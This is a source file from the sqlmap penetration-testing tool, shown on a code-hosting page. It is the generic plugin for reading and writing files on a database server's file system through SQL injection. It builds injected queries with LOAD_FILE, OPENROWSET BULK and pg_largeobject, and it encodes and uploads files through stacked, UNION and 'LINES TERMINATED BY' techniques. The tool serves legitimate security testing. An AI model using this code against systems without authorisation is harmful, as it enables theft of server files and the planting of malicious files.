Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/plugins/generic/filesystem.py
2989 views
1
#!/usr/bin/env python
2
3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7
8
import codecs
9
import os
10
import sys
11
12
from lib.core.agent import agent
13
from lib.core.common import Backend
14
from lib.core.common import checkFile
15
from lib.core.common import dataToOutFile
16
from lib.core.common import decloakToTemp
17
from lib.core.common import decodeDbmsHexValue
18
from lib.core.common import isListLike
19
from lib.core.common import isNumPosStrValue
20
from lib.core.common import isStackingAvailable
21
from lib.core.common import isTechniqueAvailable
22
from lib.core.common import readInput
23
from lib.core.compat import xrange
24
from lib.core.convert import encodeBase64
25
from lib.core.convert import encodeHex
26
from lib.core.convert import getText
27
from lib.core.convert import getUnicode
28
from lib.core.data import conf
29
from lib.core.data import kb
30
from lib.core.data import logger
31
from lib.core.enums import CHARSET_TYPE
32
from lib.core.enums import DBMS
33
from lib.core.enums import EXPECTED
34
from lib.core.enums import PAYLOAD
35
from lib.core.exception import SqlmapUndefinedMethod
36
from lib.core.settings import UNICODE_ENCODING
37
from lib.request import inject
38
39
class Filesystem(object):
40
"""
41
This class defines generic OS file system functionalities for plugins.
42
"""
43
44
def __init__(self):
45
self.fileTblName = "%sfile" % conf.tablePrefix
46
self.tblField = "data"
47
48
def _checkFileLength(self, localFile, remoteFile, fileRead=False):
49
if Backend.isDbms(DBMS.MYSQL):
50
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile
51
52
elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
53
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid
54
55
elif Backend.isDbms(DBMS.MSSQL):
56
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
57
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
58
59
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)
60
61
try:
62
localFileSize = os.path.getsize(localFile)
63
except OSError:
64
warnMsg = "file '%s' is missing" % localFile
65
logger.warning(warnMsg)
66
localFileSize = 0
67
68
if fileRead and Backend.isDbms(DBMS.PGSQL):
69
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile)
70
sameFile = True
71
else:
72
logger.debug("checking the length of the remote file '%s'" % remoteFile)
73
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
74
sameFile = None
75
76
if isNumPosStrValue(remoteFileSize):
77
remoteFileSize = int(remoteFileSize)
78
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
79
sameFile = False
80
81
if localFileSize == remoteFileSize:
82
sameFile = True
83
infoMsg = "the local file '%s' and the remote file " % localFile
84
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize)
85
elif remoteFileSize > localFileSize:
86
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize)
87
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize)
88
else:
89
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize)
90
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize)
91
92
logger.info(infoMsg)
93
else:
94
sameFile = False
95
warnMsg = "it looks like the file has not been written (usually "
96
warnMsg += "occurs if the DBMS process user has no write "
97
warnMsg += "privileges in the destination path)"
98
logger.warning(warnMsg)
99
100
return sameFile
101
102
def fileToSqlQueries(self, fcEncodedList):
103
"""
104
Called by MySQL and PostgreSQL plugins to write a file on the
105
back-end DBMS underlying file system
106
"""
107
108
counter = 0
109
sqlQueries = []
110
111
for fcEncodedLine in fcEncodedList:
112
if counter == 0:
113
sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
114
else:
115
updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
116
sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))
117
118
counter += 1
119
120
return sqlQueries
121
122
def fileEncode(self, fileName, encoding, single, chunkSize=256):
123
"""
124
Called by MySQL and PostgreSQL plugins to write a file on the
125
back-end DBMS underlying file system
126
"""
127
128
checkFile(fileName)
129
130
with open(fileName, "rb") as f:
131
content = f.read()
132
133
return self.fileContentEncode(content, encoding, single, chunkSize)
134
135
def fileContentEncode(self, content, encoding, single, chunkSize=256):
136
retVal = []
137
138
if encoding == "hex":
139
content = encodeHex(content)
140
elif encoding == "base64":
141
content = encodeBase64(content)
142
else:
143
content = codecs.encode(content, encoding)
144
145
content = getText(content).replace("\n", "")
146
147
if not single:
148
if len(content) > chunkSize:
149
for i in xrange(0, len(content), chunkSize):
150
_ = content[i:i + chunkSize]
151
152
if encoding == "hex":
153
_ = "0x%s" % _
154
elif encoding == "base64":
155
_ = "'%s'" % _
156
157
retVal.append(_)
158
159
if not retVal:
160
if encoding == "hex":
161
content = "0x%s" % content
162
elif encoding == "base64":
163
content = "'%s'" % content
164
165
retVal = [content]
166
167
return retVal
168
169
def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
170
choice = None
171
172
if forceCheck is not True:
173
message = "do you want confirmation that the local file '%s' " % localFile
174
message += "has been successfully written on the back-end DBMS "
175
message += "file system ('%s')? [Y/n] " % remoteFile
176
choice = readInput(message, default='Y', boolean=True)
177
178
if forceCheck or choice:
179
return self._checkFileLength(localFile, remoteFile)
180
181
return True
182
183
def askCheckReadFile(self, localFile, remoteFile):
184
if not kb.bruteMode:
185
message = "do you want confirmation that the remote file '%s' " % remoteFile
186
message += "has been successfully downloaded from the back-end "
187
message += "DBMS file system? [Y/n] "
188
189
if readInput(message, default='Y', boolean=True):
190
return self._checkFileLength(localFile, remoteFile, True)
191
192
return None
193
194
def nonStackedReadFile(self, remoteFile):
195
errMsg = "'nonStackedReadFile' method must be defined "
196
errMsg += "into the specific DBMS plugin"
197
raise SqlmapUndefinedMethod(errMsg)
198
199
def stackedReadFile(self, remoteFile):
200
errMsg = "'stackedReadFile' method must be defined "
201
errMsg += "into the specific DBMS plugin"
202
raise SqlmapUndefinedMethod(errMsg)
203
204
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
205
errMsg = "'unionWriteFile' method must be defined "
206
errMsg += "into the specific DBMS plugin"
207
raise SqlmapUndefinedMethod(errMsg)
208
209
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
210
errMsg = "'stackedWriteFile' method must be defined "
211
errMsg += "into the specific DBMS plugin"
212
raise SqlmapUndefinedMethod(errMsg)
213
214
def readFile(self, remoteFile):
215
localFilePaths = []
216
217
self.checkDbmsOs()
218
219
for remoteFile in remoteFile.split(','):
220
fileContent = None
221
kb.fileReadMode = True
222
223
if conf.direct or isStackingAvailable():
224
if isStackingAvailable():
225
debugMsg = "going to try to read the file with stacked query SQL "
226
debugMsg += "injection technique"
227
logger.debug(debugMsg)
228
229
fileContent = self.stackedReadFile(remoteFile)
230
elif Backend.isDbms(DBMS.MYSQL):
231
debugMsg = "going to try to read the file with non-stacked query "
232
debugMsg += "SQL injection technique"
233
logger.debug(debugMsg)
234
235
fileContent = self.nonStackedReadFile(remoteFile)
236
else:
237
errMsg = "none of the SQL injection techniques detected can "
238
errMsg += "be used to read files from the underlying file "
239
errMsg += "system of the back-end %s server" % Backend.getDbms()
240
logger.error(errMsg)
241
242
fileContent = None
243
244
kb.fileReadMode = False
245
246
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
247
self.cleanup(onlyFileTbl=True)
248
elif isListLike(fileContent):
249
newFileContent = ""
250
251
for chunk in fileContent:
252
if isListLike(chunk):
253
if len(chunk) > 0:
254
chunk = chunk[0]
255
else:
256
chunk = ""
257
258
if chunk:
259
newFileContent += chunk
260
261
fileContent = newFileContent
262
263
if fileContent is not None:
264
fileContent = decodeDbmsHexValue(fileContent, True)
265
266
if fileContent.strip():
267
localFilePath = dataToOutFile(remoteFile, fileContent)
268
269
if not Backend.isDbms(DBMS.PGSQL):
270
self.cleanup(onlyFileTbl=True)
271
272
sameFile = self.askCheckReadFile(localFilePath, remoteFile)
273
274
if sameFile is True:
275
localFilePath += " (same file)"
276
elif sameFile is False:
277
localFilePath += " (size differs from remote file)"
278
279
localFilePaths.append(localFilePath)
280
elif not kb.bruteMode:
281
errMsg = "no data retrieved"
282
logger.error(errMsg)
283
284
return localFilePaths
285
286
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
287
written = False
288
289
checkFile(localFile)
290
291
self.checkDbmsOs()
292
293
if localFile.endswith('_'):
294
localFile = getUnicode(decloakToTemp(localFile))
295
296
if conf.direct or isStackingAvailable():
297
if isStackingAvailable():
298
debugMsg = "going to upload the file '%s' with " % fileType
299
debugMsg += "stacked query technique"
300
logger.debug(debugMsg)
301
302
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
303
self.cleanup(onlyFileTbl=True)
304
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
305
debugMsg = "going to upload the file '%s' with " % fileType
306
debugMsg += "UNION query technique"
307
logger.debug(debugMsg)
308
309
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
310
elif Backend.isDbms(DBMS.MYSQL):
311
debugMsg = "going to upload the file '%s' with " % fileType
312
debugMsg += "LINES TERMINATED BY technique"
313
logger.debug(debugMsg)
314
315
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
316
else:
317
errMsg = "none of the SQL injection techniques detected can "
318
errMsg += "be used to write files to the underlying file "
319
errMsg += "system of the back-end %s server" % Backend.getDbms()
320
logger.error(errMsg)
321
322
return None
323
324
return written
325
326